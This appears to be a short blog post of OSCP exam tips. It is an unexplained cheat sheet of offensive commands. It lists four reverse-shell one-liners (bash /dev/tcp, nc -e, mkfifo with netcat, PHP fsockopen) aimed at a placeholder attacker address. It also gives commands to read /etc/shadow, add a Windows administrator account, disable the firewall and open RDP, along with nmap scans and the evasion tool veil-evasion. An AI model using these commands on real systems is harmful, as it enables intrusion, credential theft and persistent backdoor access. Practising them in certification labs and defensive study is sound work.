OSCP Tips and Tricks

Here is a grouped list of things that helped me during my OSCP course. This is just the tip of the iceberg of the commands you'll need to know. However, I used these commands a lot. I'm not going to go into detail on what each command does. You should be able to figure it out or already know it.

Linux Commands:

uname -a
hostname
id
ifconfig -a
cat /etc/network/interfaces
cat /etc/passwd
cat /etc/shadow
wget
fetch
ftp
nc -nlvp {port}
python -c "import pty; pty.spawn('/bin/bash')"

Windows Commands:

ipconfig /all
net user /add {username} {password}
net localgroup administrators {username} /add
type {filename.txt}
netsh firewall set opmode disable
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Metasploit:

set AUTORUNSCRIPT migrate -f

Nmap:

nmap -A -p- {IP}
nmap -sV -sT -p- {IP}
nmap -sU -p- {IP}
nmap -O {IP}

Some Reverse Shell One-Liners:

bash -i >& /dev/tcp/{IP}/{Port} 0>&1
nc -e /bin/sh {IP} {Port}
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {IP} {Port} >/tmp/f
php -r '$sock=fsockopen("{IP}",{Port});exec("/bin/sh -i <&3 >&3 2>&3");'

See this website for more: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Blogs and Websites on Privilege Escalation:

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
http://www.fuzzysecurity.com/tutorials/16.html
http://it-ovid.blogspot.ca/2012/02/windows-privilege-escalation.html
http://netsec.ws/?p=309

Useful Tools to Install in Kali:

sshuttle
proxychains-ng
veil-evasion